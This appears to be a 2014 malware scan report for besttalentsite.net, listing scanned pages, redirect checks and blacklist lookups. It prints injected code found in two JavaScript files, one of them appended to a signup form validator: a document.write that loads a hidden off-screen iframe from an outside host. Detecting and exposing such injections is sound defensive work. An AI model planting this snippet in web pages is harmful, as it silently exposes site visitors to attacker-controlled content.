Scanned pages/files
| Request | Server response | Status |
http://besttalentsite.net/ | 200 OK Content-Length: 16461 Content-Type: text/html | clean |
http://besttalentsite.net/javascript/functions.js | 200 OK Content-Length: 158 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://otcme.wikaba.com/97eb61.FBw9qvza?default" height="55" width="55"></iframe>'); Antivirus reports:
| ||
http://besttalentsite.net/javascript/validate.js | 200 OK Content-Length: 3147 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- function doSubmit() { var mfrm = document.frmSignup; if ( mfrm.txtusername.value == '' ) { alert ( 'Username is missing' ); mfrm.txtusername.focus(); return false; } else if ( isNumeric ( mfrm.txtusername.value.charAt(0) ) ) { alert ( 'Username must start with alphabet' ); mfrm.txtusername.focus(); return false; } else if ( mfrm.txtpassword.value == '' ) { alert ( 'Please input password' ); mfrm.txtpassword.focus alert ( 'Please input zip code' ); mfrm.txtzip.focus(); return false; } else if ( mfrm.txtaddress1.value == '' ) { alert ( 'Please input address line 1' ); mfrm.txtaddress1.focus(); return false; } else { return true; } return false; } --> ;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://otcme.wikaba.com/97eb61.FBw9qvza?default" height="55" width="55"></iframe>'); Antivirus reports:
| ||
http://besttalentsite.net/index.php | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://besttalentsite.net/test404page.js | 404 Not Found Content-Length: 399 Content-Type: text/html | clean |
http://besttalentsite.net/signup.php | 200 OK Content-Length: 67703 Content-Type: text/html | clean |
http://besttalentsite.net/index.php?page=login | 200 OK Content-Length: 16309 Content-Type: text/html | clean |
http://besttalentsite.net/index.php?page=allnews | 200 OK Content-Length: 15717 Content-Type: text/html | clean |
http://besttalentsite.net/index.php?page=privacy | 200 OK Content-Length: 32261 Content-Type: text/html | clean |
http://besttalentsite.net/feedback.php | 200 OK Content-Length: 29096 Content-Type: text/html | clean |
http://besttalentsite.net/index.php?page=terms_of_use | 200 OK Content-Length: 34439 Content-Type: text/html | clean |
http://besttalentsite.net/index.php?page=services | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://besttalentsite.net/index.php?page=faq | 200 OK Content-Length: 19566 Content-Type: text/html | clean |
http://besttalentsite.net/index.php?page=articles | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://besttalentsite.net/affindex.php | 200 OK Content-Length: 17987 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: besttalentsite.net
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sat, 03 May 2014 02:11:53 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=05121llmrp60qj867cnjlrp8o5; path=/
Set-Cookie: osdateopt_lang=english; expires=Sun, 03-May-2015 02:11:53 GMT
GET / HTTP/1.1
Host: besttalentsite.net
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sat, 03 May 2014 02:11:53 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=05121llmrp60qj867cnjlrp8o5; path=/
Set-Cookie: osdateopt_lang=english; expires=Sun, 03-May-2015 02:11:53 GMT
Second query (visit from search engine):
GET / HTTP/1.1
Host: besttalentsite.net
Referer: http://www.google.com/search?q=besttalentsite.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: besttalentsite.net
Referer: http://www.google.com/search?q=besttalentsite.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=besttalentsite.net
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://besttalentsite.net/
Result: besttalentsite.net is not infected or malware details are not published yet.
Result: besttalentsite.net is not infected or malware details are not published yet.
